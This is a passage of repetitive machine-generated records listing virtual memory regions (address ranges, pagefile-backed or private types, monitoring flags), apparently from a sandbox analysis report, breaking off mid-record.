Region: id = 20665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20667 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20668 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20669 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20670 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20671 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20672 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20673 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20674 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20675 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20676 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20677 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20678 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20715 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20716 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20727 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20728 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20732 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20733 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20737 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20738 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20739 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20740 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20741 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20742 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20745 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20746 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20747 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20748 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20749 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20750 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20751 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20752 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20753 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20754 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20755 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20756 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20757 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20760 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20766 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20769 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20788 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20789 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20790 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20791 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20825 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20826 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20844 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20845 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20848 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20849 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 